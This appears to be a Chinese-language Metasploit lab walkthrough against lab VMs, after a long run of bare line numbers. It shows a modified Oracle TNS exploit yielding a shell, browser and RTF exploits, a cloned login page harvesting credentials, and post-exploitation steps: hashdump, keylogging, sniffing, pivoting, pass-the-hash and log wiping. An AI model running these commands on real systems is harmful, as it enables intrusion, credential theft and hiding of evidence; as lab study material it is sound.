279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379

Oracle tns_auth_sesskey

use exploit/windows/oracle/tns_auth_sesskey
set payload windows/meterpreter/reverse_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 5000
set target 1
exploit
1
2
3
4
5
6
7

msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Exploit completed, but no session was created.
1
2
3
4
5
6
7
8
9
10
11

提示“no session was created”

根据书中提示信息，修改tns_auth_sesskey.rb源代码

C:\metasploit-framework\embedded\framework\modules\exploits\windows\oracle\tns_auth_sesskey.rb
1

    # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    params = []
    params << {
      'Name'   => 'AUTH_SESSKEY',
      'Value'  => sploit,
      'Flag'   => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

修改为

    # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5 + 0x20
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    params = []
    params << {
      'Name'   => 'AUTH_SESSKEY',
      'Value'  => sploit,
      'Flag'   => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

根据桌面上的oracle startup.txt中提示信息，启动Oracle

C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
conn sys/mima1234 as sysdba
startup
1
2
3

msf6 exploit(windows/oracle/tns_auth_sesskey) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Exploit completed, but no session was created.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

提示“no session was created”，更换payload为windows/shell/bind_tcp

use exploit/windows/oracle/tns_auth_sesskey
set payload windows/shell/bind_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 4555
set target 1
exploit
1
2
3
4
5
6
7

msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit

[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Started bind TCP handler against 10.10.10.130:4555
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.130
[*] Command shell session 26 opened (10.10.10.128:3719 -> 10.10.10.130:4555 ) at 2022-04-23 20:10:07 +0800


Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----


C:\oracle\product\10.2.0\db_1\DATABASE>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.254

C:\oracle\product\10.2.0\db_1\DATABASE>systeminfo
systeminfo

Host Name:                 ROOT-TVI862UBEH
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          root
Registered Organization:
Product ID:                69713-640-9722366-45109
Original Install Date:     11/15/2011, 9:50:15 PM
System Up Time:            242 Days, 0 Hours, 52 Minutes, 4 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 14 Stepping 10 GenuineIntel ~2112 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     767 MB
Available Physical Memory: 67 MB
Page File: Max Size:       2,474 MB
Page File: Available:      1,295 MB
Page File: In Use:         1,179 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.130
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78

客户端渗透

MS11050

search ms11_050
1

use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set SRVHOST 0.0.0.0
set SRVPORT 8080
set LHOST 10.10.10.128
set LPORT 4444
set target 1
set URIPATH ms11050
exploit
1
2
3
4
5
6
7
8
9

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Using URL: http://10.10.10.128:8080/ms11050
[*] Server started.
1
2
3
4

提示信息，攻击目标需要访问以下URL

http://10.10.10.128:8080/ms11050
1

因攻击目标内置IE6，非漏洞版本IE7，需要下载IE7后访问URL
https://www.download3k.com/Install-Internet-Explorer.html
https://www.microsoft.com/ja-jp/download/details.aspx?id=41071

在IE7中访问URL

http://10.10.10.128:8080/ms11050
1

Metasploit中接收到信息

[*] 192.168.10.128   ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
1

没有获得权限，IE7安装程序可能存在问题

更换攻击目标为Windows 7 IE8后，浏览器崩溃，仍无法获得权限

MS10087

search ms10_087
1

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
set CMD calc.exe
set FILENAME ms10087.rtf
exploit
1
2
3
4
5

msf6 > search ms10_087

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank   Check  Description
   -  ----                                                    ---------------  ----   -----  -----------
   0  exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  No     MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at C:/Users/IDEA/.msf4/local/ms10087.rtf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

提示信息显示文件路径

C:/Users/IDEA/.msf4/local/ms10087.rtf
1

在系统中找到这个文件，将这个文件复制到WinXP Metasploitable靶机中双击打开，攻击目标被诱导打开文件

WinXP Metasploitable在双击后会打开payload中设置的计算器程序

社会工程学

钓鱼网站

http://10.10.10.129/signin.html
1

在Kali Linux中安装Set工具以用于仿造Web界面

apt-get -y install set
1

运行set

setoolkit
1

root@DESKTOP-9I2FBB4:~# setoolkit
              ________________________
              __  ___/__  ____/__  __/
              _____ \__  __/  __  /
              ____/ /_  /___  _  /
              /____/ /_____/  /_/

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
set>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit
1
2
3
4
5
6
7
8
9
10

选择1) Social-Engineering Attacks

1
1

提示信息

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
1
2
3
4
5
6
7
8
9
10
11
12
13
14

选择2) Website Attack Vectors

2
1

提示信息

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu
1
2
3
4
5
6
7
8
9

选择3) Credential Harvester Attack Method

3
1

提示信息

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu
1
2
3
4
5

选择2) Site Cloner

2
1

提示信息

set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.10.10.128]:
1

提示信息

set:webattack> Enter the url to clone:
1

输入要克隆的URL

http://10.10.10.129/signin.html
1

set:webattack> Enter the url to clone:http://10.10.10.129/signin.html

[*] Cloning the website: http://10.10.10.129/signin.html
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
1
2
3
4
5
6
7
8
9

访问仿冒的URL

http://10.10.10.128/
1

提示信息

10.10.10.128 - - [17/Apr/2022 11:42:06] "GET / HTTP/1.1" 200 -
1

在仿冒的网页中输入用户名和口令
输入完成后会跳转到真实的地址
提示信息，获取到了在仿冒网页中输入的用户名和口令信息

[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=admin
POSSIBLE USERNAME FIELD FOUND: Login=Login
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
1
2
3
4
5

后渗透攻击

Metasploit后渗透攻击模块主要支持在渗透攻击取得目标系统远程控制权之后，在受控系统中进行各式各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、实施跳板攻击等。Metasploit位于后渗透攻击阶段主要利用post（后渗透模块）。
post（后渗透模块）：拿到权后，进一步对目标和内网进行渗透。

信息窃取

dumplinks模块获取近期操作和访问记录

run post/windows/gather/dumplinks
1

meterpreter > run post/windows/gather/dumplinks

[*] Running module against DH-CA8822AB9589
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\0927.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Copy of kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS6.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS_XPSP3.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IMS.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KingView.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KVWebSvr.dll.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\msf.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document (2).txt.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document.txt (10).lnk.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

enum_application模块获取安装软件、安全更新与漏洞补丁

run post/windows/gather/enum_applications
1

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on DH-CA8822AB9589

Installed Applications
======================

 Name                                    Version
 ----                                    -------
 Adobe Reader 9                          9.0.0
 KingView 6.53                           6.53
 KingView Driver                         6.53
 Microsoft Office Standard Edition 2003  11.0.8173.0
 Sentinel Protection Installer 7.5.0     7.5.0
 VMware Tools                            8.1.4.11056
 WebFldrs XP                             9.50.7523


[+] Results stored in: C:/Users/IDEA/.msf4/loot/20220417155003_default_192.168.10.128_host.application_916948.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

keyscan获取键盘记录

keyscan_start
keyscan_dump
keyscan_stop
1
2
3

sniffer嗅探口令

use sniffer
1

sniffer_interfaces
1

sniffer_start 1
1

sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
1

sniffer_stop 1
1

meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 8 packets (1174 bytes)
[*] Downloaded 100% (1174/1174)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to C:UsersIDEADownloadscap1.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 0 packets (0 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

enum_ie模块获取缓存IE浏览器中的口令

run post/windows/gather/enum_ie
1

meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
[*] Retrieving cookies.....
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
1
2
3
4
5
6
7
8
9

hashdump获取系统密文口令

hashdump
1

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
1
2
3
4
5
6
7

内网拓展

获取路由

run get_local_subnets
1

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.10.0/255.255.255.0
1
2
3
4
5
6

后台session

background
1

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DH-CA8822AB9589  192.168.10.1:24066 -> 192.168.10.128:5000  (192.168.10.128)

msf6 exploit(windows/smb/ms08_067_netapi) > sessions 1
[*] Starting interaction with 1...

meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

查看路由

route print
1

添加路由

route add 192.168.10.0 255.255.255.0 1
1

msf6 exploit(windows/smb/ms08_067_netapi) > route print
[*] There are currently no routes defined.
msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.10.0 255.255.255.0 1
[*] Route added
msf6 exploit(windows/smb/ms08_067_netapi) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.10.0       255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.
1
2
3
4
5
6
7
8
9
10
11
12
13
14

口令利用

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
set RHOST 192.168.10.128
set SMBUser Administrator
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
exploit
1
2
3
4
5
6
7
8

msf6 > use exploit/windows/smb/psexec
[*] Using configured payload windows/upexec/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(windows/smb/psexec) > set LPORT 443
LPORT => 443
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.10.128
RHOST => 192.168.10.128
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > exploit

[*] 192.168.10.128:445 - Connecting to the server...
[*] 192.168.10.128:445 - Authenticating to 192.168.10.128:445 as user 'Administrator'...
[-] 192.168.10.128:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

掩踪灭迹

清除日志痕迹

clearev
1

meterpreter > clearev
[*] Wiping 327 records from Application...
[*] Wiping 518 records from System...
[*] Wiping 0 records from Security...
1
2
3
4

掩饰修改的文件时间戳

timestomp
1

iCTF

环境概览

环境下载

链接: https://pan.baidu.com/s/1KYRLKW1iRS-YfSoM-xlMdg?pwd=ju8g
提取码: ju8g